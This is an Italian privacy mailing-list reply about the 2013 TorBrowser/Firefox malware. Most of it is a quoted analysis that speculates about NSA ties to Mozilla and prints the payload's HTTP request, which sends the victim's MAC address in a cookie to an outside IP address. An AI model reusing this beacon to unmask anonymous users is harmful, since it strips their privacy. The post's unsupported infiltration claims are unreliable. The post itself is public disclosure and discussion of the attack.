[e-privacy] Riguardo TorBrowser & Malware
Marco Calamari
marcoc1 a dada.it
Sab 10 Ago 2013 15:01:22 CEST
On Sat, 2013-08-10 at 13:48 +0200, Tramaci.Org wrote:
> Ho analizzato il codice del malware. Quello che è stato usato funzionava
> solo su macchine windows.
Analisi interessantissima.
Non completamente condivisibile, ma in larghissima parte si.
Direi che e' anche un buon esempio di circolazione
dell'informazione con mezzi consolidati come le mail
list.
Tanti ormai utilizzano solo mezzi per me improponibili
come le comunita' sociali
Greazie mille. Marco
> Si trattava di una vulnerabilità di firefox che permetteva di eseguire
> codice malevolo.
> Ciò significa che si può caricare da web del codice macchina ed
> eseguirlo all'insaputa dell'utente.
> Quindi chiunque su un browser non patchato può eseguire codice di
> qualunque tipo. Per esempio
> potrebbe installarvi un captatore o accede ad ogni risorsa del sistema.
>
> Sembra che dietro ci sia il solito produttore di malwer tipo NSA FBI e
> simili.
> Dovrebbero inserirli nella lista dei malware per partito preso di base
> "quei due"!
>
> Comuqnue ho fatto una ricerca sulla Mozilla foundation e sugli
> sviluppatori, c'è un tizio ex NSA che ci lavora.
> Sarebbe interessante che nei codici opensource si facesse un'analisi
> delle possibili infiltrazioni delle agenzie di malware.
>
> Io consiglierei di non usare software americano in generale.
>
> Nella versione di torbrowser non dovrebbero copiare il codice di
> firefox, forse dovrebbero usare un'altro browser
> oppure ispezionare bene il codice rimuovendo alcune features non necessarie.
>
> La domanda è:
> Qualcuno ha venduto uno 0 day agli americani per tor?
> Scopriamo chi all'interno della Mozilla o quello che è ha scritto la
> parte di codice che permette di eseguire
> programmi remoti.
>
> Ma rendiamoci conto di una cosa. Perchè usare un browser così lento che
> riesce ad occupare gran parte delle
> risorse del sistema per vedere pagine web. É come andare a caccia di
> mosche con il cannone!
>
> Firefox e mozilla dovrebbero uscire da certi progetti.
>
> Comunque, per la cronaca ècco il codice sorgente del paylod per il
> malware su torbrowser.
> Sono stati stupidi perchè potevano aggiungere qualche byte per non far
> scoprire il loro ip.
> Bastava usare la porta di tor su 127.0.0.1 e spedire la richiesta come
> socks4a ad un hidden service.
> Quindi non son tanto bravi a non farsi scoprire questi del fbi.
> Domandiamoci perchè volevano farsi vedere così tanto.
>
> Comunque ricordatevi di mandare a 65.222.202.54 come richiesta http un
> cookie con il mac address della vostra scheda di rete.
> GET /1f84ae1d-0b15-44dc-9963-8bc971104590 HTTP/1.1
> Host: hidden service
> Cookie: ID= mac address in esadecimale
> Connection: keep-alive
> Accept: */*\r\n"
> Accept-Encoding: gzip
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: This is a digitally signed message part
URL: <http://lists.winstonsmith.org/pipermail/e-privacy/attachments/20130810/b1e23784/attachment.pgp>
Maggiori informazioni sulla lista
e-privacy